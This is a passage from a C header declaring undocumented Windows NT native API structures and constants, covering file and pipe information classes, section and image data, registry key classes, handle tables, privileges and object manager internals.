} FILE_TRACKING_INFORMATION, *PFILE_TRACKING_INFORMATION;
typedef struct _FILE_COMPLETION_INFORMATION {
HANDLE Port;
PVOID Key;
} FILE_COMPLETION_INFORMATION, *PFILE_COMPLETION_INFORMATION;
//
// Define the NamedPipeType flags for NtCreateNamedPipeFile
//
#define FILE_PIPE_BYTE_STREAM_TYPE 0x00000000
#define FILE_PIPE_MESSAGE_TYPE 0x00000001
//
// Define the CompletionMode flags for NtCreateNamedPipeFile
//
#define FILE_PIPE_QUEUE_OPERATION 0x00000000
#define FILE_PIPE_COMPLETE_OPERATION 0x00000001
//
// Define the ReadMode flags for NtCreateNamedPipeFile
//
#define FILE_PIPE_BYTE_STREAM_MODE 0x00000000
#define FILE_PIPE_MESSAGE_MODE 0x00000001
//
// Define the NamedPipeConfiguration flags for NtQueryInformation
//
#define FILE_PIPE_INBOUND 0x00000000
#define FILE_PIPE_OUTBOUND 0x00000001
#define FILE_PIPE_FULL_DUPLEX 0x00000002
//
// Define the NamedPipeState flags for NtQueryInformation
//
#define FILE_PIPE_DISCONNECTED_STATE 0x00000001
#define FILE_PIPE_LISTENING_STATE 0x00000002
#define FILE_PIPE_CONNECTED_STATE 0x00000003
#define FILE_PIPE_CLOSING_STATE 0x00000004
//
// Define the NamedPipeEnd flags for NtQueryInformation
//
#define FILE_PIPE_CLIENT_END 0x00000000
#define FILE_PIPE_SERVER_END 0x00000001
typedef struct _FILE_PIPE_INFORMATION {
ULONG ReadMode;
ULONG CompletionMode;
} FILE_PIPE_INFORMATION, *PFILE_PIPE_INFORMATION;
typedef struct _FILE_PIPE_LOCAL_INFORMATION {
ULONG NamedPipeType;
ULONG NamedPipeConfiguration;
ULONG MaximumInstances;
ULONG CurrentInstances;
ULONG InboundQuota;
ULONG ReadDataAvailable;
ULONG OutboundQuota;
ULONG WriteQuotaAvailable;
ULONG NamedPipeState;
ULONG NamedPipeEnd;
} FILE_PIPE_LOCAL_INFORMATION, *PFILE_PIPE_LOCAL_INFORMATION;
typedef struct _FILE_PIPE_REMOTE_INFORMATION {
LARGE_INTEGER CollectDataTime;
ULONG MaximumCollectionCount;
} FILE_PIPE_REMOTE_INFORMATION, *PFILE_PIPE_REMOTE_INFORMATION;
typedef struct _FILE_MAILSLOT_QUERY_INFORMATION {
ULONG MaximumMessageSize;
ULONG MailslotQuota;
ULONG NextMessageSize;
ULONG MessagesAvailable;
LARGE_INTEGER ReadTimeout;
} FILE_MAILSLOT_QUERY_INFORMATION, *PFILE_MAILSLOT_QUERY_INFORMATION;
typedef struct _FILE_MAILSLOT_SET_INFORMATION {
PLARGE_INTEGER ReadTimeout;
} FILE_MAILSLOT_SET_INFORMATION, *PFILE_MAILSLOT_SET_INFORMATION;
typedef struct _FILE_REPARSE_POINT_INFORMATION {
LONGLONG FileReference;
ULONG Tag;
} FILE_REPARSE_POINT_INFORMATION, *PFILE_REPARSE_POINT_INFORMATION;
typedef struct _FILE_LINK_ENTRY_INFORMATION {
ULONG NextEntryOffset;
LONGLONG ParentFileId;
ULONG FileNameLength;
WCHAR FileName[1];
} FILE_LINK_ENTRY_INFORMATION, *PFILE_LINK_ENTRY_INFORMATION;
typedef struct _FILE_LINKS_INFORMATION {
ULONG BytesNeeded;
ULONG EntriesReturned;
FILE_LINK_ENTRY_INFORMATION Entry;
} FILE_LINKS_INFORMATION, *PFILE_LINKS_INFORMATION;
typedef struct _FILE_NETWORK_PHYSICAL_NAME_INFORMATION {
ULONG FileNameLength;
WCHAR FileName[1];
} FILE_NETWORK_PHYSICAL_NAME_INFORMATION, *PFILE_NETWORK_PHYSICAL_NAME_INFORMATION;
typedef struct _FILE_STANDARD_LINK_INFORMATION {
ULONG NumberOfAccessibleLinks;
ULONG TotalNumberOfLinks;
BOOLEAN DeletePending;
BOOLEAN Directory;
} FILE_STANDARD_LINK_INFORMATION, *PFILE_STANDARD_LINK_INFORMATION;
typedef struct _FILE_SFIO_RESERVE_INFORMATION {
ULONG RequestsPerPeriod;
ULONG Period;
BOOLEAN RetryFailures;
BOOLEAN Discardable;
ULONG RequestSize;
ULONG NumOutstandingRequests;
} FILE_SFIO_RESERVE_INFORMATION, *PFILE_SFIO_RESERVE_INFORMATION;
typedef struct _FILE_SFIO_VOLUME_INFORMATION {
ULONG MaximumRequestsPerPeriod;
ULONG MinimumPeriod;
ULONG MinimumTransferSize;
} FILE_SFIO_VOLUME_INFORMATION, *PFILE_SFIO_VOLUME_INFORMATION;
//
// Define the flags for NtSet(Query)EaFile service structure entries
//
#define FILE_NEED_EA 0x00000080
//
// Define EA type values
//
#define FILE_EA_TYPE_BINARY 0xfffe
#define FILE_EA_TYPE_ASCII 0xfffd
#define FILE_EA_TYPE_BITMAP 0xfffb
#define FILE_EA_TYPE_METAFILE 0xfffa
#define FILE_EA_TYPE_ICON 0xfff9
#define FILE_EA_TYPE_EA 0xffee
#define FILE_EA_TYPE_MVMT 0xffdf
#define FILE_EA_TYPE_MVST 0xffde
#define FILE_EA_TYPE_ASN1 0xffdd
#define FILE_EA_TYPE_FAMILY_IDS 0xff01
typedef struct _FILE_FULL_EA_INFORMATION {
ULONG NextEntryOffset;
UCHAR Flags;
UCHAR EaNameLength;
USHORT EaValueLength;
CHAR EaName[1];
} FILE_FULL_EA_INFORMATION, *PFILE_FULL_EA_INFORMATION;
typedef struct _FILE_GET_EA_INFORMATION {
ULONG NextEntryOffset;
UCHAR EaNameLength;
CHAR EaName[1];
} FILE_GET_EA_INFORMATION, *PFILE_GET_EA_INFORMATION;
typedef struct _FILE_GET_QUOTA_INFORMATION {
ULONG NextEntryOffset;
ULONG SidLength;
SID Sid;
} FILE_GET_QUOTA_INFORMATION, *PFILE_GET_QUOTA_INFORMATION;
typedef struct _FILE_QUOTA_INFORMATION {
ULONG NextEntryOffset;
ULONG SidLength;
LARGE_INTEGER ChangeTime;
LARGE_INTEGER QuotaUsed;
LARGE_INTEGER QuotaThreshold;
LARGE_INTEGER QuotaLimit;
SID Sid;
} FILE_QUOTA_INFORMATION, *PFILE_QUOTA_INFORMATION;
typedef struct _FILE_DIRECTORY_INFORMATION {
ULONG NextEntryOffset;
ULONG FileIndex;
LARGE_INTEGER CreationTime;
LARGE_INTEGER LastAccessTime;
LARGE_INTEGER LastWriteTime;
LARGE_INTEGER ChangeTime;
LARGE_INTEGER EndOfFile;
LARGE_INTEGER AllocationSize;
ULONG FileAttributes;
ULONG FileNameLength;
WCHAR FileName[1];
} FILE_DIRECTORY_INFORMATION, *PFILE_DIRECTORY_INFORMATION;
typedef struct _FILE_FULL_DIR_INFORMATION {
ULONG NextEntryOffset;
ULONG FileIndex;
LARGE_INTEGER CreationTime;
LARGE_INTEGER LastAccessTime;
LARGE_INTEGER LastWriteTime;
LARGE_INTEGER ChangeTime;
LARGE_INTEGER EndOfFile;
LARGE_INTEGER AllocationSize;
ULONG FileAttributes;
ULONG FileNameLength;
ULONG EaSize;
WCHAR FileName[1];
} FILE_FULL_DIR_INFORMATION, *PFILE_FULL_DIR_INFORMATION;
typedef struct _FILE_ID_FULL_DIR_INFORMATION {
ULONG NextEntryOffset;
ULONG FileIndex;
LARGE_INTEGER CreationTime;
LARGE_INTEGER LastAccessTime;
LARGE_INTEGER LastWriteTime;
LARGE_INTEGER ChangeTime;
LARGE_INTEGER EndOfFile;
LARGE_INTEGER AllocationSize;
ULONG FileAttributes;
ULONG FileNameLength;
ULONG EaSize;
LARGE_INTEGER FileId;
WCHAR FileName[1];
} FILE_ID_FULL_DIR_INFORMATION, *PFILE_ID_FULL_DIR_INFORMATION;
typedef struct _FILE_BOTH_DIR_INFORMATION {
ULONG NextEntryOffset;
ULONG FileIndex;
LARGE_INTEGER CreationTime;
LARGE_INTEGER LastAccessTime;
LARGE_INTEGER LastWriteTime;
LARGE_INTEGER ChangeTime;
LARGE_INTEGER EndOfFile;
LARGE_INTEGER AllocationSize;
ULONG FileAttributes;
ULONG FileNameLength;
ULONG EaSize;
CCHAR ShortNameLength;
WCHAR ShortName[12];
WCHAR FileName[1];
} FILE_BOTH_DIR_INFORMATION, *PFILE_BOTH_DIR_INFORMATION;
typedef struct _FILE_ID_BOTH_DIR_INFORMATION {
ULONG NextEntryOffset;
ULONG FileIndex;
LARGE_INTEGER CreationTime;
LARGE_INTEGER LastAccessTime;
LARGE_INTEGER LastWriteTime;
LARGE_INTEGER ChangeTime;
LARGE_INTEGER EndOfFile;
LARGE_INTEGER AllocationSize;
ULONG FileAttributes;
ULONG FileNameLength;
ULONG EaSize;
CCHAR ShortNameLength;
WCHAR ShortName[12];
LARGE_INTEGER FileId;
WCHAR FileName[1];
} FILE_ID_BOTH_DIR_INFORMATION, *PFILE_ID_BOTH_DIR_INFORMATION;
typedef struct _FILE_NAMES_INFORMATION {
ULONG NextEntryOffset;
ULONG FileIndex;
ULONG FileNameLength;
WCHAR FileName[1];
} FILE_NAMES_INFORMATION, *PFILE_NAMES_INFORMATION;
typedef struct _FILE_OBJECTID_INFORMATION {
LONGLONG FileReference;
UCHAR ObjectId[16];
union {
struct {
UCHAR BirthVolumeId[16];
UCHAR BirthObjectId[16];
UCHAR DomainId[16];
};
UCHAR ExtendedInfo[48];
};
} FILE_OBJECTID_INFORMATION, *PFILE_OBJECTID_INFORMATION;
typedef struct _FILE_FS_VOLUME_INFORMATION {
LARGE_INTEGER VolumeCreationTime;
ULONG VolumeSerialNumber;
ULONG VolumeLabelLength;
BOOLEAN SupportsObjects;
WCHAR VolumeLabel[1];
} FILE_FS_VOLUME_INFORMATION, *PFILE_FS_VOLUME_INFORMATION;
typedef struct _FILE_ID_GLOBAL_TX_DIR_INFORMATION
{
ULONG NextEntryOffset;
ULONG FileIndex;
LARGE_INTEGER CreationTime;
LARGE_INTEGER LastAccessTime;
LARGE_INTEGER LastWriteTime;
LARGE_INTEGER ChangeTime;
LARGE_INTEGER EndOfFile;
LARGE_INTEGER AllocationSize;
ULONG FileAttributes;
ULONG FileNameLength;
LARGE_INTEGER FileId;
GUID LockingTransactionId;
ULONG TxInfoFlags;
WCHAR FileName[1];
} FILE_ID_GLOBAL_TX_DIR_INFORMATION, *PFILE_ID_GLOBAL_TX_DIR_INFORMATION;
/*
** File END
*/
/*
** Section START
*/
typedef enum _SECTION_INFORMATION_CLASS {
SectionBasicInformation,
SectionImageInformation,
SectionRelocationInformation,
SectionOriginalBaseInformation,
SectionInternalImageInformation,
MaxSectionInfoClass
} SECTION_INFORMATION_CLASS;
typedef struct _SECTION_BASIC_INFO {
PVOID BaseAddress;
ULONG AllocationAttributes;
LARGE_INTEGER MaximumSize;
} SECTION_BASIC_INFORMATION, *PSECTION_BASIC_INFORMATION;
typedef struct _SECTION_IMAGE_INFORMATION {
PVOID TransferAddress;
ULONG ZeroBits;
SIZE_T MaximumStackSize;
SIZE_T CommittedStackSize;
ULONG SubSystemType;
union {
struct {
USHORT SubSystemMinorVersion;
USHORT SubSystemMajorVersion;
};
ULONG SubSystemVersion;
};
union
{
struct
{
USHORT MajorOperatingSystemVersion;
USHORT MinorOperatingSystemVersion;
};
ULONG OperatingSystemVersion;
};
USHORT ImageCharacteristics;
USHORT DllCharacteristics;
USHORT Machine;
BOOLEAN ImageContainsCode;
union
{
UCHAR ImageFlags;
struct
{
UCHAR ComPlusNativeReady : 1;
UCHAR ComPlusILOnly : 1;
UCHAR ImageDynamicallyRelocated : 1;
UCHAR ImageMappedFlat : 1;
UCHAR BaseBelow4gb : 1;
UCHAR ComPlusPrefer32bit : 1;
UCHAR Reserved : 2;
};
};
ULONG LoaderFlags;
ULONG ImageFileSize;
ULONG CheckSum;
} SECTION_IMAGE_INFORMATION, *PSECTION_IMAGE_INFORMATION;
typedef struct _MI_EXTRA_IMAGE_INFORMATION {
ULONG SizeOfHeaders;
ULONG SizeOfImage;
} MI_EXTRA_IMAGE_INFORMATION, *PMI_EXTRA_IMAGE_INFORMATION;
typedef struct _MI_SECTION_IMAGE_INFORMATION {
SECTION_IMAGE_INFORMATION ExportedImageInformation;
MI_EXTRA_IMAGE_INFORMATION InternalImageInformation;
} MI_SECTION_IMAGE_INFORMATION, *PMI_SECTION_IMAGE_INFORMATION;
typedef struct _SECTION_IMAGE_INFORMATION64 {
ULONGLONG TransferAddress;
ULONG ZeroBits;
ULONGLONG MaximumStackSize;
ULONGLONG CommittedStackSize;
ULONG SubSystemType;
union {
struct {
USHORT SubSystemMinorVersion;
USHORT SubSystemMajorVersion;
};
ULONG SubSystemVersion;
};
union
{
struct
{
USHORT MajorOperatingSystemVersion;
USHORT MinorOperatingSystemVersion;
};
ULONG OperatingSystemVersion;
};
USHORT ImageCharacteristics;
USHORT DllCharacteristics;
USHORT Machine;
BOOLEAN ImageContainsCode;
union
{
UCHAR ImageFlags;
struct
{
UCHAR ComPlusNativeReady : 1;
UCHAR ComPlusILOnly : 1;
UCHAR ImageDynamicallyRelocated : 1;
UCHAR ImageMappedFlat : 1;
UCHAR BaseBelow4gb : 1;
UCHAR ComPlusPrefer32bit : 1;
UCHAR Reserved : 2;
};
};
ULONG LoaderFlags;
ULONG ImageFileSize;
ULONG CheckSum;
} SECTION_IMAGE_INFORMATION64, *PSECTION_IMAGE_INFORMATION64;
typedef struct _SECTION_INTERNAL_IMAGE_INFORMATION {
SECTION_IMAGE_INFORMATION SectionInformation;
union
{
ULONG ExtendedFlags;
struct
{
ULONG ImageExportSuppressionEnabled : 1;
ULONG ImageCetShadowStacksReady : 1; // 20H1
ULONG ImageXfgEnabled : 1; // 20H2
ULONG ImageCetShadowStacksStrictMode : 1;
ULONG ImageCetSetContextIpValidationRelaxedMode : 1;
ULONG ImageCetDynamicApisAllowInProc : 1;
ULONG ImageCetDowngradeReserved1 : 1;
ULONG ImageCetDowngradeReserved2 : 1;
ULONG Reserved : 24;
};
};
} SECTION_INTERNAL_IMAGE_INFORMATION, * PSECTION_INTERNAL_IMAGE_INFORMATION;
typedef enum _SECTION_INHERIT {
ViewShare = 1,
ViewUnmap = 2
} SECTION_INHERIT;
#ifndef SEC_BASED
#define SEC_BASED 0x200000
#endif
#ifndef SEC_NO_IMAGE
#define SEC_NO_CHANGE 0x400000
#endif
#ifndef SEC_FILE
#define SEC_FILE 0x800000
#endif
#ifndef SEC_IMAGE
#define SEC_IMAGE 0x1000000
#endif
#ifndef SEC_RESERVE
#define SEC_RESERVE 0x4000000
#endif
#ifndef SEC_COMMIT
#define SEC_COMMIT 0x8000000
#endif
#ifndef SEC_NOCACHE
#define SEC_NOCACHE 0x10000000
#endif
#ifndef SEC_GLOBAL
#define SEC_GLOBAL 0x20000000
#endif
#ifndef SEC_LARGE_PAGES
#define SEC_LARGE_PAGES 0x80000000
#endif
/*
** Section END
*/
/*
** System Table START
*/
#define NUMBER_SERVICE_TABLES 2
#define NTOS_SERVICE_INDEX 0
#define WIN32K_SERVICE_INDEX 1
#define SERVICE_NUMBER_MASK ((1 << 12) - 1)
#if defined(_WIN64)
#if defined(_AMD64_)
#define SERVICE_TABLE_SHIFT (12 - 4)
#define SERVICE_TABLE_MASK (((1 << 1) - 1) << 4)
#define SERVICE_TABLE_TEST (WIN32K_SERVICE_INDEX << 4)
#else
#define SERVICE_TABLE_SHIFT (12 - 5)
#define SERVICE_TABLE_MASK (((1 << 1) - 1) << 5)
#define SERVICE_TABLE_TEST (WIN32K_SERVICE_INDEX << 5)
#endif
#else
#define SERVICE_TABLE_SHIFT (12 - 4)
#define SERVICE_TABLE_MASK (((1 << 1) - 1) << 4)
#define SERVICE_TABLE_TEST (WIN32K_SERVICE_INDEX << 4)
#endif
typedef struct _KSERVICE_TABLE_DESCRIPTOR {
ULONG_PTR Base; //e.g. KiServiceTable
PULONG Count;
ULONG Limit;//e.g. KiServiceLimit
PUCHAR Number; //e.g. KiArgumentTable
} KSERVICE_TABLE_DESCRIPTOR, *PKSERVICE_TABLE_DESCRIPTOR;
/*
** System Table END
*/
/*
** System Boot Environment START
*/
// Size=20
typedef struct _SYSTEM_BOOT_ENVIRONMENT_INFORMATION_V1 {
GUID BootIdentifier;
FIRMWARE_TYPE FirmwareType;
} SYSTEM_BOOT_ENVIRONMENT_INFORMATION_V1, *PSYSTEM_BOOT_ENVIRONMENT_INFORMATION_V1;
// Size=32
typedef struct _SYSTEM_BOOT_ENVIRONMENT_INFORMATION {
GUID BootIdentifier;
FIRMWARE_TYPE FirmwareType;
union
{
ULONGLONG BootFlags;
struct
{
ULONGLONG DbgMenuOsSelection : 1; // RS4
ULONGLONG DbgHiberBoot : 1;
ULONGLONG DbgSoftBoot : 1;
ULONGLONG DbgMeasuredLaunch : 1;
ULONGLONG DbgMeasuredLaunchCapable : 1; // 19H1
ULONGLONG DbgSystemHiveReplace : 1;
ULONGLONG DbgMeasuredLaunchSmmProtections : 1;
ULONGLONG DbgMeasuredLaunchSmmLevel : 7; // 20H1
};
};
} SYSTEM_BOOT_ENVIRONMENT_INFORMATION, *PSYSTEM_BOOT_ENVIRONMENT_INFORMATION;
/*
** System Boot Environment END
*/
/*
** Key START
*/
typedef enum _KEY_INFORMATION_CLASS {
KeyBasicInformation,
KeyNodeInformation,
KeyFullInformation,
KeyNameInformation,
KeyCachedInformation,
KeyFlagsInformation,
KeyVirtualizationInformation,
KeyHandleTagsInformation,
KeyTrustInformation,
KeyLayerInformation,
MaxKeyInfoClass
} KEY_INFORMATION_CLASS;
typedef enum _KEY_SET_INFORMATION_CLASS {
KeyWriteTimeInformation,
KeyWow64FlagsInformation,
KeyControlFlagsInformation,
KeySetVirtualizationInformation,
KeySetDebugInformation,
KeySetHandleTagsInformation,
KeySetLayerInformation,
MaxKeySetInfoClass
} KEY_SET_INFORMATION_CLASS;
typedef struct _KEY_FULL_INFORMATION {
LARGE_INTEGER LastWriteTime;
ULONG TitleIndex;
ULONG ClassOffset;
ULONG ClassLength;
ULONG SubKeys;
ULONG MaxNameLen;
ULONG MaxClassLen;
ULONG Values;
ULONG MaxValueNameLen;
ULONG MaxValueDataLen;
WCHAR Class[1];
} KEY_FULL_INFORMATION, *PKEY_FULL_INFORMATION;
typedef struct _KEY_BASIC_INFORMATION {
LARGE_INTEGER LastWriteTime;
ULONG TitleIndex;
ULONG NameLength;
WCHAR Name[1];
} KEY_BASIC_INFORMATION, *PKEY_BASIC_INFORMATION;
typedef enum _KEY_VALUE_INFORMATION_CLASS {
KeyValueBasicInformation,
KeyValueFullInformation,
KeyValuePartialInformation,
KeyValueFullInformationAlign64,
KeyValuePartialInformationAlign64,
KeyValueLayerInformation,
MaxKeyValueInfoClass
} KEY_VALUE_INFORMATION_CLASS;
typedef struct _KEY_VALUE_BASIC_INFORMATION {
ULONG TitleIndex;
ULONG Type;
ULONG NameLength;
WCHAR Name[1]; // Variable size
} KEY_VALUE_BASIC_INFORMATION, *PKEY_VALUE_BASIC_INFORMATION;
typedef struct _KEY_VALUE_FULL_INFORMATION {
ULONG TitleIndex;
ULONG Type;
ULONG DataOffset;
ULONG DataLength;
ULONG NameLength;
WCHAR Name[1]; // Variable size
// Data[1]; // Variable size data not declared
} KEY_VALUE_FULL_INFORMATION, *PKEY_VALUE_FULL_INFORMATION;
typedef struct _KEY_VALUE_PARTIAL_INFORMATION {
ULONG TitleIndex;
ULONG Type;
ULONG DataLength;
UCHAR Data[1]; // Variable size
} KEY_VALUE_PARTIAL_INFORMATION, *PKEY_VALUE_PARTIAL_INFORMATION;
typedef struct _KEY_VALUE_PARTIAL_INFORMATION_ALIGN64 {
ULONG Type;
ULONG DataLength;
UCHAR Data[1]; // Variable size
} KEY_VALUE_PARTIAL_INFORMATION_ALIGN64, *PKEY_VALUE_PARTIAL_INFORMATION_ALIGN64;
typedef struct _KEY_VALUE_ENTRY {
PUNICODE_STRING ValueName;
ULONG DataLength;
ULONG DataOffset;
ULONG Type;
} KEY_VALUE_ENTRY, *PKEY_VALUE_ENTRY;
/*
** Key END
*/
/*
** TIME_FIELDS START
*/
typedef struct _TIME_FIELDS {
CSHORT Year; // range [1601...]
CSHORT Month; // range [1..12]
CSHORT Day; // range [1..31]
CSHORT Hour; // range [0..23]
CSHORT Minute; // range [0..59]
CSHORT Second; // range [0..59]
CSHORT Milliseconds;// range [0..999]
CSHORT Weekday; // range [0..6] == [Sunday..Saturday]
} TIME_FIELDS;
typedef TIME_FIELDS *PTIME_FIELDS;
/*
** TIME_FIELDS END
*/
/*
** HANDLE START
*/
typedef struct _SYSTEM_HANDLE_TABLE_ENTRY_INFO {
USHORT UniqueProcessId;
USHORT CreatorBackTraceIndex;
UCHAR ObjectTypeIndex;
UCHAR HandleAttributes;
USHORT HandleValue;
PVOID Object;
ULONG GrantedAccess;
} SYSTEM_HANDLE_TABLE_ENTRY_INFO, *PSYSTEM_HANDLE_TABLE_ENTRY_INFO;
typedef struct _SYSTEM_HANDLE_INFORMATION {
ULONG NumberOfHandles;
SYSTEM_HANDLE_TABLE_ENTRY_INFO Handles[1];
} SYSTEM_HANDLE_INFORMATION, *PSYSTEM_HANDLE_INFORMATION;
typedef struct _SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX {
PVOID Object;
ULONG_PTR UniqueProcessId;
ULONG_PTR HandleValue;
ULONG GrantedAccess;
USHORT CreatorBackTraceIndex;
USHORT ObjectTypeIndex;
ULONG HandleAttributes;
ULONG Reserved;
} SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX, *PSYSTEM_HANDLE_TABLE_ENTRY_INFO_EX;
typedef struct _SYSTEM_HANDLE_INFORMATION_EX {
ULONG_PTR NumberOfHandles;
ULONG_PTR Reserved;
SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX Handles[1];
} SYSTEM_HANDLE_INFORMATION_EX, *PSYSTEM_HANDLE_INFORMATION_EX;
/*
** HANDLE END
*/
// Privileges
#define SE_MIN_WELL_KNOWN_PRIVILEGE (2L)
#define SE_CREATE_TOKEN_PRIVILEGE (2L)
#define SE_ASSIGNPRIMARYTOKEN_PRIVILEGE (3L)
#define SE_LOCK_MEMORY_PRIVILEGE (4L)
#define SE_INCREASE_QUOTA_PRIVILEGE (5L)
#define SE_MACHINE_ACCOUNT_PRIVILEGE (6L)
#define SE_TCB_PRIVILEGE (7L)
#define SE_SECURITY_PRIVILEGE (8L)
#define SE_TAKE_OWNERSHIP_PRIVILEGE (9L)
#define SE_LOAD_DRIVER_PRIVILEGE (10L)
#define SE_SYSTEM_PROFILE_PRIVILEGE (11L)
#define SE_SYSTEMTIME_PRIVILEGE (12L)
#define SE_PROF_SINGLE_PROCESS_PRIVILEGE (13L)
#define SE_INC_BASE_PRIORITY_PRIVILEGE (14L)
#define SE_CREATE_PAGEFILE_PRIVILEGE (15L)
#define SE_CREATE_PERMANENT_PRIVILEGE (16L)
#define SE_BACKUP_PRIVILEGE (17L)
#define SE_RESTORE_PRIVILEGE (18L)
#define SE_SHUTDOWN_PRIVILEGE (19L)
#define SE_DEBUG_PRIVILEGE (20L)
#define SE_AUDIT_PRIVILEGE (21L)
#define SE_SYSTEM_ENVIRONMENT_PRIVILEGE (22L)
#define SE_CHANGE_NOTIFY_PRIVILEGE (23L)
#define SE_REMOTE_SHUTDOWN_PRIVILEGE (24L)
#define SE_UNDOCK_PRIVILEGE (25L)
#define SE_SYNC_AGENT_PRIVILEGE (26L)
#define SE_ENABLE_DELEGATION_PRIVILEGE (27L)
#define SE_MANAGE_VOLUME_PRIVILEGE (28L)
#define SE_IMPERSONATE_PRIVILEGE (29L)
#define SE_CREATE_GLOBAL_PRIVILEGE (30L)
#define SE_TRUSTED_CREDMAN_ACCESS_PRIVILEGE (31L)
#define SE_RELABEL_PRIVILEGE (32L)
#define SE_INC_WORKING_SET_PRIVILEGE (33L)
#define SE_TIME_ZONE_PRIVILEGE (34L)
#define SE_CREATE_SYMBOLIC_LINK_PRIVILEGE (35L)
#define SE_DELEGATE_SESSION_USER_IMPERSONATE_PRIVILEGE (36L)
#define SE_MAX_WELL_KNOWN_PRIVILEGE SE_DELEGATE_SESSION_USER_IMPERSONATE_PRIVILEGE
//
// Generic test for success on any status value (non-negative numbers
// indicate success).
//
#define NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0)
//
// Generic test for information on any status value.
//
#define NT_INFORMATION(Status) ((ULONG)(Status) >> 30 == 1)
//
// Generic test for warning on any status value.
//
#define NT_WARNING(Status) ((ULONG)(Status) >> 30 == 2)
//
// Generic test for error on any status value.
//
#define NT_ERROR(Status) ((ULONG)(Status) >> 30 == 3)
/*
** OBJECT MANAGER START
*/
//
// Header flags
//
#define OB_FLAG_NEW_OBJECT 0x01
#define OB_FLAG_KERNEL_OBJECT 0x02
#define OB_FLAG_CREATOR_INFO 0x04
#define OB_FLAG_EXCLUSIVE_OBJECT 0x08
#define OB_FLAG_PERMANENT_OBJECT 0x10
#define OB_FLAG_DEFAULT_SECURITY_QUOTA 0x20
#define OB_FLAG_SINGLE_HANDLE_ENTRY 0x40
#define OB_FLAG_DELETED_INLINE 0x80
//
// InfoMask values
//
#define OB_INFOMASK_PROCESS_INFO 0x10
#define OB_INFOMASK_QUOTA 0x08
#define OB_INFOMASK_HANDLE 0x04
#define OB_INFOMASK_NAME 0x02
#define OB_INFOMASK_CREATOR_INFO 0x01
#define OBJ_INVALID_SESSION_ID 0xFFFFFFFF
#define NUMBER_HASH_BUCKETS 37
typedef struct _OBJECT_DIRECTORY_ENTRY {
PVOID ChainLink;
PVOID Object;
ULONG HashValue;
} OBJECT_DIRECTORY_ENTRY, *POBJECT_DIRECTORY_ENTRY;
typedef struct _EX_PUSH_LOCK {
union {
struct {
ULONG_PTR Locked : 1;
ULONG_PTR Waiting : 1;
ULONG_PTR Waking : 1;
ULONG_PTR MultipleShared : 1;
ULONG_PTR Shared : sizeof(ULONG_PTR) * 8 - 4;
};
ULONG_PTR Value;
PVOID Ptr;
};
} EX_PUSH_LOCK, *PEX_PUSH_LOCK;
typedef struct _EX_PUSH_LOCK_AUTO_EXPAND_STATE {
union {
struct {
ULONG Expanded : 1;
ULONG Transitioning : 1;
ULONG Pageable : 1;
};
ULONG Value;
};
} EX_PUSH_LOCK_AUTO_EXPAND_STATE, *PEX_PUSH_LOCK_AUTO_EXPAND_STATE; /* size: 0x0004 */
typedef struct _EX_PUSH_LOCK_AUTO_EXPAND {
EX_PUSH_LOCK LocalLock;
EX_PUSH_LOCK_AUTO_EXPAND_STATE State;
ULONG Stats;
} EX_PUSH_LOCK_AUTO_EXPAND, *PEX_PUSH_LOCK_AUTO_EXPAND; /* size: 0x0010 */
typedef struct _OBJECT_NAMESPACE_LOOKUPTABLE {
LIST_ENTRY HashBuckets[NUMBER_HASH_BUCKETS];
EX_PUSH_LOCK Lock;
ULONG NumberOfPrivateSpaces;
} OBJECT_NAMESPACE_LOOKUPTABLE, *POBJECT_NAMESPACE_LOOKUPTABLE;
typedef struct _OBJECT_NAMESPACE_ENTRY {
LIST_ENTRY ListEntry;
PVOID NamespaceRootDirectory;
ULONG SizeOfBoundaryInformation;
ULONG Reserved;
UCHAR HashValue;
ULONG_PTR Alignment;
} OBJECT_NAMESPACE_ENTRY, *POBJECT_NAMESPACE_ENTRY;
typedef enum _BOUNDARY_ENTRY_TYPE {
OBNS_Invalid = 0,
OBNS_Name = 1,
OBNS_SID = 2,
OBNS_IntegrityLabel = 3
} BOUNDARY_ENTRY_TYPE;
typedef struct _OBJECT_BOUNDARY_ENTRY {
BOUNDARY_ENTRY_TYPE EntryType;
ULONG EntrySize;
} OBJECT_BOUNDARY_ENTRY, *POBJECT_BOUNDARY_ENTRY;
typedef struct _OBJECT_BOUNDARY_DESCRIPTOR {
ULONG Version;
ULONG Items;
ULONG TotalSize;
ULONG Reserved;
} OBJECT_BOUNDARY_DESCRIPTOR, *POBJECT_BOUNDARY_DESCRIPTOR;
typedef struct _OBJECT_DIRECTORY {
POBJECT_DIRECTORY_ENTRY HashBuckets[NUMBER_HASH_BUCKETS];
EX_PUSH_LOCK Lock;
PDEVICE_MAP DeviceMap;
ULONG SessionId;
PVOID NamespaceEntry;
ULONG Flags;
} OBJECT_DIRECTORY, *POBJECT_DIRECTORY;
typedef struct _OBJECT_DIRECTORY_V2 {
POBJECT_DIRECTORY_ENTRY HashBuckets[NUMBER_HASH_BUCKETS];
EX_PUSH_LOCK Lock;
PDEVICE_MAP DeviceMap;
POBJECT_DIRECTORY ShadowDirectory;
ULONG SessionId;
PVOID NamespaceEntry;
ULONG Flags;
LONG Padding[1];
} OBJECT_DIRECTORY_V2, *POBJECT_DIRECTORY_V2;
typedef struct _OBJECT_DIRECTORY_V3 {
POBJECT_DIRECTORY_ENTRY HashBuckets[NUMBER_HASH_BUCKETS];
EX_PUSH_LOCK Lock;
PDEVICE_MAP DeviceMap;
POBJECT_DIRECTORY ShadowDirectory;
PVOID NamespaceEntry;
PVOID SessionObject;
ULONG Flags;
ULONG SessionId;
} OBJECT_DIRECTORY_V3, *POBJECT_DIRECTORY_V3;
typedef struct _OBJECT_HEADER_NAME_INFO {
POBJECT_DIRECTORY Directory;
UNICODE_STRING Name;
ULONG QueryReferences;
} OBJECT_HEADER_NAME_INFO, *POBJECT_HEADER_NAME_INFO;
typedef struct _OBJECT_HEADER_CREATOR_INFO {// Size=32
LIST_ENTRY TypeList; // Size=16 Offset=0
PVOID CreatorUniqueProcess; // Size=8 Offset=16
USHORT CreatorBackTraceIndex; // Size=2 Offset=24
USHORT Reserved; // Size=2 Offset=26
} OBJECT_HEADER_CREATOR_INFO, *POBJECT_HEADER_CREATOR_INFO;
typedef struct _OBJECT_HANDLE_COUNT_ENTRY {// Size=16
PVOID Process; // Size=8 Offset=0
struct
{
unsigned long HandleCount : 24; // Size=4 Offset=8 BitOffset=0 BitCount=24
unsigned long LockCount : 8; // Size=4 Offset=8 BitOffset=24 BitCount=8
};
